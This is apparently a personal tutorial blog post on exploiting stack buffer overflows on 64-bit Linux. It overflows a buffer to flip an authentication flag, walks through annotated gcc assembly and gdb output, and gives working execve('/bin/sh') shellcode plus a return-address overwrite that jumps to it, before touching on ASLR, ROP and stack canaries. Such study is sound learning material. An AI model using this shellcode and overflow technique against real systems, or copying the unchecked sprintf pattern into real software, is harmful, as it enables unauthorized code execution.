Exploiting Stack Buffer Overflows

This post collects information on how to take control of applications using buffer overflows. We’ll start with a motivating example. Jon Larimer (yeah, the guy works for IBM) exploits buffer overflows to gain control of a screen-locked Linux machine. Here is the video (minute 45 onwards is the most fun). He mentions the book The Art of Software Security Assessment; I’m not sure if it’s that good.

This first example is an introduction to the idea behind a buffer overflow. The vulnerability can be used to get authenticated without the proper access rights. Such a scenario should be relatively rare, but why not be lucky once in a while. Keep in mind that whether this works or not depends heavily on the compiler, because the compiler decides where each local variable ends up on the stack. I was using gcc 4.5.2 on 64-bit Intel Linux.

#include <stdio.h>

int verify_password(char *username, char *password) {
    return 0; // this would be more complex
}

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[8];
    int i = 0;

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer,
                "%s",
                username);
        printf("%s\n", buffer);
    }

    return authenticated;
}

int main() {
    char* user = "konne is\x01";
    char* pw = "password";

    int v = authenticate(user,pw);
    printf("%d\n",v);

    return 0;
}

What happens is that buffer cannot hold the entire username: the string is 9 characters plus the terminating zero byte, but buffer has room for only 8 bytes. The extra bytes spill into the memory right after it. Because buffer is on the stack, this memory holds other local variables, in our case authenticated, which receives the \x01 and is now non-zero.
This is definitely cool, but it would be even better if we could figure out how to overwrite the return address of the function. This return address is pushed onto the stack by the asm instruction call.
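
To make the spill concrete without depending on a particular compiler, here is a minimal sketch that models the relevant part of the stack frame as a plain byte array. The layout (an 8-byte buffer directly followed by the 4-byte authenticated) is an assumption that happens to match what my gcc produced, the name overflow_model is made up for this illustration, and the result assumes a little-endian machine.

```c
#include <string.h>

/* Hypothetical model of the frame: bytes 0..7 are buffer,
 * bytes 8..11 are authenticated (assumed layout, little-endian). */
enum { BUFFER_OFF = 0, AUTH_OFF = 8, FRAME_SIZE = 12 };

/* Copies username the way an unbounded string copy would (including the
 * terminating NUL) and returns the resulting value of authenticated.
 * The copy is clamped to the model's size so the sketch itself stays safe. */
int overflow_model(const char *username)
{
    unsigned char frame[FRAME_SIZE] = {0};   /* authenticated starts as 0 */
    size_t n = strlen(username) + 1;         /* string plus NUL */
    int authenticated;

    if (n > FRAME_SIZE - BUFFER_OFF)
        n = FRAME_SIZE - BUFFER_OFF;
    memcpy(frame + BUFFER_OFF, username, n);

    memcpy(&authenticated, frame + AUTH_OFF, sizeof authenticated);
    return authenticated;
}
```

Calling overflow_model("konne is\x01") gives 1 under these assumptions, because the ninth character lands in the first byte of authenticated, while a name of up to 7 characters leaves it at 0.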

Let’s do some disassembling to figure out where the stuff we need to overwrite is. gcc -S (as described here) makes gcc stop after compiling and write out the assembly it generated. If you know as much about asm as I do, you will need some sort of explanation (German) of what is going on.

Overview of the most important stuff about the ASM:

  • Syntax is called AT&T-Syntax
  • mov source,destination
  • Constants start with $

It looks as if the stack pointer is in the %rsp register. The base pointer should be in %rbp. (The base pointer marks the start of our function’s stack frame; the local variables sit at negative offsets from it.) As of now, I have no clue what the .cfi* things stand for.

Here is how to read the following instruction:
movq %rdi, -24(%rbp)
Copy the 8-byte value of %rdi to the memory at the address in the base pointer plus an offset of -24.
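
If AT&T syntax is hard to read, it may help to see the same store and the matching load written in C. This is only a sketch: rbp is an ordinary pointer into a byte array that stands in for the stack, and the names movq_store and movq_load are invented for this example.

```c
#include <stdint.h>
#include <string.h>

/* Models "movq %reg, off(%rbp)": store the 8 bytes of value at the
 * address rbp + off. rbp is just a pointer into a byte array here. */
void movq_store(unsigned char *rbp, long off, uint64_t value)
{
    memcpy(rbp + off, &value, sizeof value);
}

/* Models "movq off(%rbp), %reg": load 8 bytes from rbp + off. */
uint64_t movq_load(const unsigned char *rbp, long off)
{
    uint64_t value;
    memcpy(&value, rbp + off, sizeof value);
    return value;
}
```

With unsigned char stack[64] and rbp = stack + 32, movq_store(rbp, -24, x) writes into stack[8] to stack[15], which is the "negative offset from the base pointer" pattern that shows up all over the listing.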

Here is the assembly generated for the code from before. (Read it, it’s full of handwritten comments.)

.file	"stacktest.c"
.text

// ####################################
// This is the function verify_password
// ####################################

.globl verify_password
	.type	verify_password, @function
verify_password:
.LFB0:
	.cfi_startproc
	pushq	%rbp          // backup the base pointer
	.cfi_def_cfa_offset 16
	movq	%rsp, %rbp        // set the basepointer to the stacktop
	.cfi_offset 6, -16
	.cfi_def_cfa_register 6

	movq	%rdi, -8(%rbp)      // looks like this was some sort of fastcall and
	movq	%rsi, -16(%rbp)     // we push the registers onto the stack
	movl	$0, %eax            // prepare the return value
	leave                       // restores the base pointer
	.cfi_def_cfa 7, 8
	ret                         // jumps to the calling function, this is the value
	                            // we want to overwrite
	.cfi_endproc
.LFE0:
	.size	verify_password, .-verify_password

// #################################
// This is the function authenticate
// #################################

.globl authenticate
	.type	authenticate, @function
authenticate:
.LFB1:
	.cfi_startproc
	pushq	%rbp                // base pointer stuff
	.cfi_def_cfa_offset 16
	movq	%rsp, %rbp
	.cfi_offset 6, -16
	.cfi_def_cfa_register 6

	subq	$32, %rsp           // prepare the stackpointer for the values to be pushed
	movq	%rdi, -24(%rbp)     // again fastcall parameters
	movq	%rsi, -32(%rbp)
	movl	$0, -4(%rbp)        // init i, -4 is i

	// prepare the call to verify_password
	// this whole copying of the parameters just seems ridiculous
	// but I didn't use any optimization (1)
	movq	-32(%rbp), %rdx     // password -32, see (2)
	movq	-24(%rbp), %rax
	movq	%rdx, %rsi
	movq	%rax, %rdi
	call	verify_password
	movl	%eax, -8(%rbp)      // stores the return value in authenticated

	// if authenticated == 0
	cmpl	$0, -8(%rbp)
	jne	.L3
	// then

	// prepare call to strcpy, moving the right values into the registers
	// now why is this strcpy? shouldn't it be sprintf?
	// well apparently, gcc is smart enough to optimize that call
	// even with optimization turned off, but totally screws up in (1)
	movq	-24(%rbp), %rdx   // this tells us, that the username is -24 (2)
	leaq	-16(%rbp), %rax   // buffer is -16
	movq	%rdx, %rsi
	movq	%rax, %rdi
	call	strcpy

	// again, gcc changes the function we are calling
	leaq	-16(%rbp), %rax
	movq	%rax, %rdi
	call	puts
	// endif

.L3:
	movl	-8(%rbp), %eax      // return authenticated
	leave                       // reset the basepointer
	.cfi_def_cfa 7, 8
	ret                         // return
	.cfi_endproc
.LFE1:
	.size	authenticate, .-authenticate
	.section	.rodata

// #################################
// Some static data
// #################################

.LC0:
	.string	"konne is\001"
.LC1:
	.string	"password"
.LC2:
	.string	"%d\n"
	.text

// #################################
// This is the function main
// #################################

.globl main
	.type	main, @function
main:
.LFB2:
	.cfi_startproc
	pushq	%rbp                // backup base pointer
	.cfi_def_cfa_offset 16
	movq	%rsp, %rbp
	.cfi_offset 6, -16
	.cfi_def_cfa_register 6

	 // prepare stack for authentication function call
	subq	$32, %rsp
	movq	$.LC0, -8(%rbp)     // push pointers to the static data on the stack
	movq	$.LC1, -16(%rbp)
	movq	-16(%rbp), %rdx
	movq	-8(%rbp), %rax
	movq	%rdx, %rsi
	movq	%rax, %rdi
	call	authenticate
	movl	%eax, -20(%rbp)     // save return value

	// print the value
	movl	$.LC2, %eax
	movl	-20(%rbp), %edx
	movl	%edx, %esi
	movq	%rax, %rdi
	movl	$0, %eax
	call	printf
	movl	$0, %eax

	leave           // restore base pointer
	.cfi_def_cfa 7, 8
	ret             // return
	.cfi_endproc
.LFE2:
	.size	main, .-main
	.ident	"GCC: (GNU) 4.5.2 20110127 (prerelease)"
	.section	.note.GNU-stack,"",@progbits

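About the fast-call stuff, I was right, see Wikipedia. The convention is called the System V AMD64 ABI; it passes the first six integer or pointer arguments in %rdi, %rsi, %rdx, %rcx, %r8 and %r9, which is why username arrives in %rdi and password in %rsi.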
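
As a small cheat sheet while reading the listing, the register order of that calling convention can be written down as a lookup table. The register order is the one the convention defines for integer and pointer arguments; the function name int_arg_register is made up for this sketch.

```c
#include <stddef.h>

/* Registers used for the first six integer or pointer arguments in the
 * System V AMD64 calling convention, in order. */
static const char *const INT_ARG_REGS[] = {
    "rdi", "rsi", "rdx", "rcx", "r8", "r9"
};

/* Returns the register holding integer argument number index (0-based),
 * or NULL if that argument is passed on the stack instead. */
const char *int_arg_register(size_t index)
{
    size_t count = sizeof INT_ARG_REGS / sizeof INT_ARG_REGS[0];
    return index < count ? INT_ARG_REGS[index] : NULL;
}
```

For authenticate(username, password) this gives rdi for username (index 0) and rsi for password (index 1), which matches the two movq instructions at the top of the function.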

So what did we learn from looking at the ASM? Well, the stack frame of authenticate looks as follows (lower addresses at the top of the page; keep in mind that the stack grows towards lower addresses). Each line reads: offset from %rbp / size in bytes.

-32/8 [password]
-24/8 [username]
-16/8 [buffer]
-8/4 [authenticated]
-4/4 [i]
0/8 [backup rbp]
8/8 [hopefully return pointer]

buffer starts at offset -16 and the return pointer at offset 8, so 8+4+4+8 = 8*3 = 24 characters in buffer should catapult us to the function’s return pointer, so that we can overwrite it. Finding the return address’s stack position this way is rather cumbersome. An easier way is to just write a lot of characters and see which value was in the return position when the app crashes.
Just do something like this (24 characters of padding plus 4 that land in the return pointer)
user = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA";

If you examine the core file with gdb you’ll see
% gdb -q -c core
[New Thread 17093]
Core was generated by `./stacktest'.
Program terminated with signal 11, Segmentation fault.
#0 0x0000000041414141 in ?? ()

We see that the lower 4 bytes of the return pointer were overwritten (0x41 = ‘A’). With this technique, finding the right length turns into a simple binary search: lengthen or shorten the string until the A’s just reach the return pointer.
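
A variation that can save a few rounds of searching is to use a different letter for every 8-byte stack slot, so that the byte found in the return pointer tells you the offset directly. The following is a rough sketch of that idea, not something taken from the video or the book; the function names are invented, and it assumes the buffer starts on an 8-byte boundary relative to the return pointer.

```c
#include <stddef.h>

enum { GROUP = 8 };  /* one letter per 8-byte stack slot (assumption) */

/* Fills out with groups of 8 identical letters: 8 x 'A', 8 x 'B', ...
 * out must have room for groups * 8 + 1 bytes; at most 26 groups. */
void make_pattern(char *out, size_t groups)
{
    size_t g, k;
    if (groups > 26)
        groups = 26;
    for (g = 0; g < groups; g++)
        for (k = 0; k < GROUP; k++)
            out[g * GROUP + k] = (char)('A' + g);
    out[groups * GROUP] = '\0';
}

/* Given one byte of the overwritten return pointer, returns the offset
 * of the group it came from, or -1 if the byte is not from the pattern. */
long pattern_offset(unsigned char byte)
{
    if (byte < 'A' || byte > 'Z')
        return -1;
    return (long)(byte - 'A') * GROUP;
}
```

If the overwritten return pointer turns out to consist of the byte 0x44 (‘D’), pattern_offset(0x44) gives 24, which agrees with the offset worked out from the assembly.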

Let’s try to write some assembler and jump to it. If you don’t know how to write inline ASM yet, check out the tutorial about gcc inline assembler.

I’m basically copying an example from the book mentioned in the beginning. It is just too pretty!
Keep in mind that syscalls and 64bit are weird. Here is a good example on how to do 64bit syscalls. The call numbers are found in /usr/include/asm/unistd_64.h or in the gcc assembly.
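
To get a feeling for the 64-bit syscall mechanics before touching execve, here is a small sketch that issues a harmless system call by hand. It assumes x86-64 Linux for the inline assembly (on anything else it falls back to the libc syscall() wrapper), and raw_syscall0 is a name made up for this example.

```c
#include <sys/syscall.h>   /* SYS_getpid */
#include <unistd.h>        /* syscall() for the fallback */

/* Issues a system call that takes no arguments.
 * On x86-64 Linux the call number goes into rax, the "syscall"
 * instruction enters the kernel, and the result comes back in rax;
 * the instruction clobbers rcx and r11. Elsewhere fall back to libc. */
long raw_syscall0(long number)
{
#if defined(__x86_64__) && defined(__linux__)
    long result;
    __asm__ volatile ("syscall"
                      : "=a"(result)
                      : "a"(number)
                      : "rcx", "r11", "memory");
    return result;
#else
    return syscall(number);
#endif
}
```

raw_syscall0(SYS_getpid) should return the same value as getpid(). The execve call used in the shellcode works the same way, with the number 59 in rax and its three arguments in rdi, rsi and rdx.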

With this information, we can write an ASM example that should work.

    asm("jmp end             \n"
        "code:               \n"
        "popq %rdi           \n" // popl %ebx
                                 // EBX = pathname argument
        "xorq %rax, %rax     \n" // zero out EAX
        "movq %rax, %rdx     \n" // EDX = envp
        "pushq %rax          \n" // pushl %eax
                                 // put NULL in argv array
        "pushq %rdi          \n" // pushl %ebx
                                 // put "/bin/sh" in argv array
        "movq %rsp, %rsi     \n" // ECX = argv
        "movq $59, %rax      \n" // 0x0b = execve() system call
        "syscall             \n" // system call
        "call code           \n"
        ".string \"/bin/sh\" ");

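But it doesn’t. Time for gdb. Stepping through ASM is explained here. So I found the bug: the end: label in front of call code was missing, so jmp end did not land where it was supposed to. Here is the fixed version. Strike, it works!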

#include <stdio.h>
#include <string.h>

void myasm() {
    asm(".text               \n"
        "jmp end             \n" // prepare loading string's address
        "code:               \n"
        "popq %rdi           \n" // RDI = pathname argument
        "xorq %rax, %rax     \n" // zero out RAX
        "movq %rax, %rdx     \n" // RDX = envp
        "pushq %rax          \n" // put NULL in argv array
        "pushq %rdi          \n" // put "/bin/sh" in argv array
        "movq %rsp, %rsi     \n" // RSI = argv
        "movq $59, %rax      \n" // 59 = execve() system call
        "syscall             \n" // system call
        "end:                \n"
        "call code           \n" // this pushes the string's address
                                 // onto the stack, and jumps to code:
        ".string \"/bin/sh\" \n"
        ".text");
}

int verify_password(char *username, char *password) {
    return 0;
}

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[8];
    int i = 0;

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer,"%s",username);
        printf("You (%s) are not allowed in here!\n", buffer);
    }

    return authenticated;
}

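int main() {
    char user[33];

    long asmptr = (long)myasm;   // address we want authenticate to return to
    // 24 bytes of padding reach the return address, 8 placeholder bytes follow
    strcpy(user,"012345678901234567890123--------");
    // overwrite the placeholder (bytes 24..31) with the address of myasm
    ((long*)user)[3] = asmptr;
    char* pw = "password";
    int v = authenticate(user,pw);

    printf("%d\n",v);

    return 0;
}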
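
The way main assembles the username can be generalized a little. The sketch below builds the same kind of payload for an arbitrary padding length; build_payload is a made-up helper, the address used in the example call is invented, and the byte order assumes a little-endian 64-bit machine.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Writes padding filler bytes followed by the 8 bytes of target into
 * out, then a terminating NUL. out needs room for padding + 8 + 1 bytes. */
void build_payload(char *out, size_t padding, uint64_t target)
{
    memset(out, 'A', padding);                      /* reach the return address */
    memcpy(out + padding, &target, sizeof target);  /* new return address */
    out[padding + sizeof target] = '\0';
}
```

One detail is easy to miss: the string copy in authenticate stops at the first zero byte. For a made-up target such as 0x400634, strlen of the payload is only 24 + 3 = 27, so just the three low bytes of the address get copied, followed by the terminating zero. That is still enough here because the upper bytes of the original return address are zero already.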

The problem is that most software does not ship with functionality that will start a terminal, so we can’t just jump to it. But it would be very easy to just put the parameters on the stack and call the appropriate C function. Unfortunately, there are common measures to prevent this. Address space layout randomization (ASLR) is our enemy. It loads libraries at random positions so that we can’t just use a constant pointer as the return address. Let’s see how well the randomization works. Well, in my test I overestimated Linux’s abilities: the library addresses did not change between runs. Don’t count on that, though; it depends on the setting in /proc/sys/kernel/randomize_va_space, and with randomization switched on shared libraries do get a different base address on every run.

But even where it is easy to jump to a system library function, it is hard to pass parameters. The AMD64 calling convention passes the first six integer or pointer parameters in registers and not on the stack, and it is very hard to get parameters into registers when all we have is a stack overflow.

The solution to all our pains is Return Oriented Programming. I won’t explain it here, but I will make you go and look it up somewhere else (haha, I’m that powerful). Together with the previous link and this tutorial, you should have enough information to understand it. It’s really not that hard.
Here is a quote that should further motivate you to read on.

We describe return-oriented programming, a generalization of return-into-libc that allows an attacker to undertake arbitrary, Turing-complete computation without injecting code.

For ROP to work, it is necessary to have a rather large code base to pick instruction sequences from. The C++ standard library is big and should contain enough code. g++ -static-libstdc++ stacktest.c -o stacktest links your program statically with the C++ standard library. As epic as ROP is, it has one major drawback: I have not yet found a tool that finds the locations of the needed assembler instructions for you.

Canaries in GCC are another evil invention. They render our attacks impossible or at least very hard. The compiler puts a check value in front of the return address on the stack. This value is checked right before the function returns. If it was altered (you will generally have to overwrite it if you want to overwrite the return address), the application terminates loudly. The price is a little runtime overhead, since every protected function has to store and check the value.
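
The idea behind the canary can be played through on a model of the frame. This is only a sketch of the principle and not what GCC actually emits: the layout (buffer, then canary, then return address) is simplified, and the names are invented for this illustration.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical frame model: 8-byte buffer, 8-byte canary, then the
 * 8-byte return address. Real frames also hold other locals and the
 * saved base pointer. */
enum { BUF_OFF = 0, CANARY_OFF = 8, RET_OFF = 16, MODEL_SIZE = 24 };

/* Copies input (with its NUL) into the modeled buffer without checking
 * the buffer size, then performs the check done before returning.
 * Returns 1 if the canary is intact, 0 if the overflow was detected. */
int canary_intact_after_copy(const char *input, uint64_t canary)
{
    unsigned char frame[MODEL_SIZE] = {0};
    uint64_t seen;
    size_t n = strlen(input) + 1;

    memcpy(frame + CANARY_OFF, &canary, sizeof canary);  /* function entry */

    if (n > MODEL_SIZE)                                  /* keep the sketch safe */
        n = MODEL_SIZE;
    memcpy(frame + BUF_OFF, input, n);                   /* the overflowing copy */

    memcpy(&seen, frame + CANARY_OFF, sizeof seen);      /* check before return */
    return seen == canary;
}
```

Any input long enough to reach the return address at offset 16 has to run over the canary at offset 8 first, so the check fails before the overwritten address is ever used. In GCC the real thing is switched on with -fstack-protector, and a failed check ends in a call to __stack_chk_fail.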

Control-Flow Integrity (German article) is a technique to prevent ROP that had not been implemented at the time of writing. I have no clue how it works due to lack of interest.

A summary of many defense mechanisms is given in this presentation. If you (are lame and) use a 32-bit Windows, check out this tutorial. And here is yet another very good tutorial.

Now that you know all the necessary stuff, do you want to become a security specialist? Here is a history of discovered vulnerabilities.
History

As you can see, they didn’t come up with many ways to attack a system in the entire history of buffer overflow research. But coming up with new attacks is really not that hard. JIT Spraying (German link) is an example of an awesome new attack vector that is so hard to come up with :).

So I tried to find a real-world security issue myself. And I realized what most of a security guy’s work is all about: reading code and looking for vulnerabilities. It is extremely frustrating because you can’t tell whether you are making any progress. Maybe it wasn’t smart to look at code written by a security guy. But I can now say that GTK’s io-xpm.c seems to be safe.

I think I don’t want to be a security specialist. It sounds pretty boring. But if you feel differently, give me your opinion.
